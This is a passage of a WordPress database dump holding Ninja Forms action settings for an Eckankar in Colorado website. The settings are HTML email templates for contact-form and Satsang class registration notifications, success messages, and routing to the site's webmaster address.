end.'),(7251,243,'payment_gateways','','payment_gateways',''),(7252,243,'payment_total','0','payment_total','0'),(7253,243,'tag','','tag',''),(7254,243,'email_message_plain','','email_message_plain',''),(7255,243,'submitter_email','','submitter_email',''),(7256,243,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(7257,243,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(7258,243,'set_subs_to_expire','0','set_subs_to_expire','0'),(7259,243,'subs_expire_time','90','subs_expire_time','90'),(7260,243,'title','','title',''),(7261,243,'key','','key',''),(7262,243,'type','successmessage','type','successmessage'),(7263,243,'active','1','active','1'),(7264,243,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(7265,243,'date_updated','2016-01-15','date_updated','2016-01-15'),(7266,243,'from_name','','from_name',''),(7267,243,'from_address','','from_address',''),(7268,243,'to','{wp:admin_email}','to','{wp:admin_email}'),(7269,243,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(7270,243,'email_message','{fields_table}','email_message','{fields_table}'),(7271,243,'attach_csv','0','attach_csv','0'),(7272,243,'email_format','html','email_format','html'),(7273,243,'reply_to','','reply_to',''),(7274,243,'cc','','cc',''),(7275,243,'bcc','','bcc',''),(7276,243,'redirect_url','','redirect_url',''),(7277,243,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>'),(7278,243,'label','Success Message','label','Success Message'),(7279,243,'parent_id','13','parent_id','13'),(7280,243,'drawerDisabled','','drawerDisabled',''),(7281,244,'email_message_plain','','email_message_plain',''),(7282,244,'tag','','tag',''),(7283,244,'payment_gateways','','payment_gateways',''),(7284,244,'payment_total','0','payment_total','0'),(7285,244,'objectType','Action','objectType','Action'),(7286,244,'objectDomain','actions','objectDomain','actions'),(7287,244,'editActive','','editActive',''),(7288,244,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(7289,244,'title','','title',''),(7290,244,'key','','key',''),(7291,244,'type','email','type','email'),(7292,244,'active','1','active','1'),(7293,244,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(7294,244,'date_updated','2016-01-19','date_updated','2016-01-19'),(7295,244,'from_name','Eckankar In Colorado Contact Form','from_name','Eckankar In Colorado Contact Form'),(7296,244,'from_address','contact@eckankar-colorado.org','from_address','contact@eckankar-colorado.org'),(7297,244,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(7298,244,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(7299,244,'attach_csv','0','attach_csv','0'),(7300,244,'email_format','html','email_format','html'),(7301,244,'reply_to','','reply_to',''),(7302,244,'cc','','cc',''),(7303,244,'bcc','','bcc',''),(7304,244,'redirect_url','','redirect_url',''),(7305,244,'success_msg','','success_msg',''),(7306,244,'label','Admin Email','label','Admin Email'),(7307,244,'parent_id','13','parent_id','13'),(7308,244,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new \"Eckankar in Colorado Contact\" form submission.<br /><br /><br />\r\n</strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p><br /><br />\r\n<p>The following person has requested contact. Here is the information that <strong><span style=\"color: #333333\">{field:textbox_268}</span></strong> has submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong> {field:textbox_303}</span><br /><br /><br />\r\n <br /><br /><br />\r\n<span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new \"Eckankar in Colorado Contact\" form submission.<br /><br /><br />\r\n</strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p><br /><br />\r\n<p>The following person has requested contact. Here is the information that <strong><span style=\"color: #333333\">{field:textbox_268}</span></strong> has submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong> {field:textbox_303}</span><br /><br /><br />\r\n <br /><br /><br />\r\n<span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(7424,250,'message','{all_fields_table}','message','{all_fields_table}'),(7425,250,'order','2','order','2'),(7426,250,'payment_gateways','','payment_gateways',''),(7427,250,'payment_total','0','payment_total','0'),(7428,250,'tag','','tag',''),(7429,250,'email_subject','New Satsang Class Registration','email_subject','New Satsang Class Registration'),(7430,250,'from_name','','from_name',''),(7431,250,'from_address','{system:admin_email}','from_address','{system:admin_email}'),(7432,250,'reply_to','','reply_to',''),(7433,250,'email_format','html','email_format','html'),(7434,250,'cc','','cc',''),(7435,250,'bcc','','bcc',''),(7436,250,'attach_csv','','attach_csv',''),(7437,250,'parent_id','37','parent_id','37'),(7438,250,'email_message_plain','','email_message_plain',''),(7439,250,'drawerDisabled','','drawerDisabled',''),(7440,250,'title','','title',''),(7441,250,'key','','key',''),(7442,250,'type','email','type','email'),(7443,250,'active','1','active','1'),(7444,250,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(7445,250,'label','User Email Confirmation','label','User Email Confirmation'),(7446,250,'objectType','Action','objectType','Action'),(7447,250,'objectDomain','actions','objectDomain','actions'),(7448,250,'editActive','','editActive',''),(7449,250,'to','{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}','to','{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}'),(7450,250,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(7451,250,'email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 0px; padding-bottom: -10px; background-color: rgba(239, 243, 250, 0.41);\"><div class=\"col-md-12 col-sm-12 col-xs-12\" style=\"border-color: #af5908; border-width: 3px; border-image: none 100% / 1 / 0 stretch; background-color: #fcfcfc;\"><h3 class=\"\" style=\"font-size: 40px; text-transform: capitalize; color: #23507d; margin-top: 0px; margin-bottom: -30px; font-family: Raleway; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Eckankar In Colorado</h3><p class=\"\" style=\"font-size: 26px; margin-bottom: 0px; font-family: Open Sans; font-weight: 300; color: #23507d; font-style: italic;\" data-font-style=\"italic\" data-font-family=\"Open Sans\" data-font-weight=\"300\"><strong>Web Submission Confirmation</strong></p><p class=\"\" style=\"font-size: 27px; margin-bottom: 0px; color: #ad5605; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"text-decoration: underline;\">Satsang Class Registration -- 2023-2024<br></span></p><p class=\"\" style=\"font-size: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hello {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711},</p><p class=\"\" style=\"font-size: 18px; margin-top: -13px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have registered for a new ECK Satsang Class. Great to have you onboard! The Arahata for the class will be contacting you before the class starts. <br><br><em>Below is the information that you have submitted:</em></p><table style=\"border-collapse: collapse; width: 60%; border: 2px solid #d4d2d2;\"><tbody><tr><td style=\"width: 100%; background-color: #eeeeee; padding: 20px;\"><p class=\"\" style=\"font-size: 16px;\"><strong>First Name: &nbsp;</strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Last Name:&nbsp; </strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Email:&nbsp; </strong>{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Phone:&nbsp; </strong>{field:less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\"><strong>Class Chosen</strong><strong>: </strong>{field:select_one_class_per_registrant_1658696832524}</span></span></span><strong></strong><strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Optional Message:&nbsp; </strong>{field:enter_message_for_arahata_optional_1599679737041}</p></td></tr></tbody></table></div></div><div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"font-size: 15px;\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</p></div></div></div></div>','email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 0px; padding-bottom: -10px; background-color: rgba(239, 243, 250, 0.41);\"><div class=\"col-md-12 col-sm-12 col-xs-12\" style=\"border-color: #af5908; border-width: 3px; border-image: none 100% / 1 / 0 stretch; background-color: #fcfcfc;\"><h3 class=\"\" style=\"font-size: 40px; text-transform: capitalize; color: #23507d; margin-top: 0px; margin-bottom: -30px; font-family: Raleway; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Eckankar In Colorado</h3><p class=\"\" style=\"font-size: 26px; margin-bottom: 0px; font-family: Open Sans; font-weight: 300; color: #23507d; font-style: italic;\" data-font-style=\"italic\" data-font-family=\"Open Sans\" data-font-weight=\"300\"><strong>Web Submission Confirmation</strong></p><p class=\"\" style=\"font-size: 27px; margin-bottom: 0px; color: #ad5605; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"text-decoration: underline;\">Satsang Class Registration -- 2023-2024<br></span></p><p class=\"\" style=\"font-size: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hello {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711},</p><p class=\"\" style=\"font-size: 18px; margin-top: -13px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have registered for a new ECK Satsang Class. Great to have you onboard! The Arahata for the class will be contacting you before the class starts. <br><br><em>Below is the information that you have submitted:</em></p><table style=\"border-collapse: collapse; width: 60%; border: 2px solid #d4d2d2;\"><tbody><tr><td style=\"width: 100%; background-color: #eeeeee; padding: 20px;\"><p class=\"\" style=\"font-size: 16px;\"><strong>First Name: &nbsp;</strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Last Name:&nbsp; </strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Email:&nbsp; </strong>{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Phone:&nbsp; </strong>{field:less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498}<strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\"><strong>Class Chosen</strong><strong>: </strong>{field:select_one_class_per_registrant_1658696832524}</span></span></span><strong></strong><strong><br></strong></p><p class=\"\" style=\"font-size: 16px;\"><strong>Optional Message:&nbsp; </strong>{field:enter_message_for_arahata_optional_1599679737041}</p></td></tr></tbody></table></div></div><div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"font-size: 15px;\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</p></div></div></div></div>'),(7452,251,'title','','title',''),(7453,251,'key','','key',''),(7454,251,'type','save','type','save'),(7455,251,'active','1','active','1'),(7456,251,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(7457,251,'label','Store Submission','label','Store Submission'),(7458,251,'objectType','Action','objectType','Action'),(7459,251,'objectDomain','actions','objectDomain','actions'),(7460,251,'editActive','','editActive',''),(7461,251,'order','3','order','3'),(7462,251,'payment_gateways','','payment_gateways',''),(7463,251,'payment_total','0','payment_total','0'),(7464,251,'tag','','tag',''),(7465,251,'to','{wp:admin_email}','to','{wp:admin_email}'),(7466,251,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(7467,251,'email_message','{fields_table}','email_message','{fields_table}'),(7468,251,'from_name','','from_name',''),(7469,251,'from_address','','from_address',''),(7470,251,'reply_to','','reply_to',''),(7471,251,'email_format','html','email_format','html'),(7472,251,'cc','','cc',''),(7473,251,'bcc','','bcc',''),(7474,251,'attach_csv','','attach_csv',''),(7475,251,'redirect_url','','redirect_url',''),(7476,251,'parent_id','37','parent_id','37'),(7477,251,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(7478,251,'email_message_plain','','email_message_plain',''),(7479,251,'submitter_email','','submitter_email',''),(7480,251,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(7481,251,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(7482,251,'set_subs_to_expire','0','set_subs_to_expire','0'),(7483,251,'subs_expire_time','90','subs_expire_time','90'),(7484,251,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(7485,252,'title','','title',''),(7486,252,'key','','key',''),(7487,252,'type','email','type','email'),(7488,252,'active','1','active','1'),(7489,252,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(7490,252,'label','Admin Email Notification','label','Admin Email Notification'),(7491,252,'objectType','Action','objectType','Action'),(7492,252,'objectDomain','actions','objectDomain','actions'),(7493,252,'editActive','','editActive',''),(7494,252,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(7495,252,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(7496,252,'message','{all_fields_table}','message','{all_fields_table}'),(7497,252,'order','2','order','2'),(7498,252,'payment_gateways','','payment_gateways',''),(7499,252,'payment_total','0','payment_total','0'),(7500,252,'tag','','tag',''),(7501,252,'email_subject','New Event Registration from {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711} {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}','email_subject','New Event Registration from {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711} {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}'),(7502,252,'from_name','','from_name',''),(7503,252,'from_address','','from_address',''),(7504,252,'reply_to','{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}','reply_to','{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}'),(7505,252,'email_format','html','email_format','html'),(7506,252,'cc','','cc',''),(7507,252,'bcc','','bcc',''),(7508,252,'attach_csv','','attach_csv',''),(7509,252,'parent_id','37','parent_id','37'),(7510,252,'email_message_plain','','email_message_plain',''),(7511,252,'drawerDisabled','','drawerDisabled',''),(7512,252,'email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 0px; padding-bottom: -10px; background-color: rgba(239, 243, 250, 0.41);\"><div class=\"col-md-12 col-sm-12 col-xs-12\" style=\"border-color: #af5908; border-width: 3px; border-image: none 100% / 1 / 0 stretch; background-color: #fcfcfc;\"><h3 class=\"\" style=\"font-size: 40px; text-transform: capitalize; color: #23507d; margin-top: 0px; margin-bottom: -30px; font-family: Raleway; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Eckankar In Colorado</h3><p class=\"\" style=\"font-size: 26px; margin-bottom: 0px; font-family: Open Sans; font-weight: 300; color: #23507d; font-style: italic;\" data-font-style=\"italic\" data-font-family=\"Open Sans\" data-font-weight=\"300\"><strong>New Web Submission</strong></p><p class=\"\" style=\"font-size: 27px; margin-bottom: 0px; color: #ad5605; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"text-decoration: underline;\">Satsang Class Registration - 2023-2024<br></span></p><h3 class=\"\" style=\"text-transform: capitalize; font-family: Open Sans; font-weight: 400; font-size: 22px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You Have A New Web Submission from: <span style=\"color: #727171; font-weight: bold;\">{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711} {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}</span></h3><p class=\"\" style=\"font-size: 16px; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This form was generated by a user on the Eckankar In Colorado website.<br>Below is the information that the user has submitted:</p><table style=\"border-collapse: collapse; width: 45%;\"><tbody><tr><td style=\"width: 100%; background-color: #eeeeee; padding: 20px;\"><p class=\"\" style=\"font-size: 16px;\"><strong>First Name: &nbsp;</strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711}</p><p class=\"\" style=\"font-size: 16px;\"><strong>Last Name:&nbsp; </strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}</p><p class=\"\" style=\"font-size: 16px;\"><strong>Email:&nbsp; </strong>{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}</p><p class=\"\" style=\"font-size: 16px;\"><strong>Phone:&nbsp; </strong>{field:less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498}</p>  <p class=\"\" style=\"font-size: 16px;\"><strong>Class Chosen:&nbsp;</strong>{field:select_one_class_per_registrant_1658696832524}</p><p class=\"\" style=\"font-size: 16px;\"><strong>Optional Message:&nbsp; </strong>{field:enter_message_for_arahata_optional_1599679737041}</p></td></tr></tbody></table></div></div><div class=\"row\" style=\"padding-bottom: 0px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"font-size: 14px;\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado</a><br>webmaster: webmaster@eckankar-colorado.org</p></div></div></div></div>','email_message','<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 0px; padding-bottom: -10px; background-color: rgba(239, 243, 250, 0.41);\"><div class=\"col-md-12 col-sm-12 col-xs-12\" style=\"border-color: #af5908; border-width: 3px; border-image: none 100% / 1 / 0 stretch; background-color: #fcfcfc;\"><h3 class=\"\" style=\"font-size: 40px; text-transform: capitalize; color: #23507d; margin-top: 0px; margin-bottom: -30px; font-family: Raleway; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Eckankar In Colorado</h3><p class=\"\" style=\"font-size: 26px; margin-bottom: 0px; font-family: Open Sans; font-weight: 300; color: #23507d; font-style: italic;\" data-font-style=\"italic\" data-font-family=\"Open Sans\" data-font-weight=\"300\"><strong>New Web Submission</strong></p><p class=\"\" style=\"font-size: 27px; margin-bottom: 0px; color: #ad5605; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"text-decoration: underline;\">Satsang Class Registration - 2023-2024<br></span></p><h3 class=\"\" style=\"text-transform: capitalize; font-family: Open Sans; font-weight: 400; font-size: 22px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You Have A New Web Submission from: <span style=\"color: #727171; font-weight: bold;\">{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711} {field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}</span></h3><p class=\"\" style=\"font-size: 16px; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This form was generated by a user on the Eckankar In Colorado website.<br>Below is the information that the user has submitted:</p><table style=\"border-collapse: collapse; width: 45%;\"><tbody><tr><td style=\"width: 100%; background-color: #eeeeee; padding: 20px;\"><p class=\"\" style=\"font-size: 16px;\"><strong>First Name: &nbsp;</strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711}</p><p class=\"\" style=\"font-size: 16px;\"><strong>Last Name:&nbsp; </strong>{field:less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625}</p><p class=\"\" style=\"font-size: 16px;\"><strong>Email:&nbsp; </strong>{field:less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837}</p><p class=\"\" style=\"font-size: 16px;\"><strong>Phone:&nbsp; </strong>{field:less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498}</p>  <p class=\"\" style=\"font-size: 16px;\"><strong>Class Chosen:&nbsp;</strong>{field:select_one_class_per_registrant_1658696832524}</p><p class=\"\" style=\"font-size: 16px;\"><strong>Optional Message:&nbsp; </strong>{field:enter_message_for_arahata_optional_1599679737041}</p></td></tr></tbody></table></div></div><div class=\"row\" style=\"padding-bottom: 0px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"font-size: 14px;\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado</a><br>webmaster: webmaster@eckankar-colorado.org</p></div></div></div></div>'),(7513,253,'title','','title',''),(7514,253,'key','','key',''),(7515,253,'type','successmessage','type','successmessage'),(7516,253,'active','1','active','1'),(7517,253,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(7518,253,'label','Success Message','label','Success 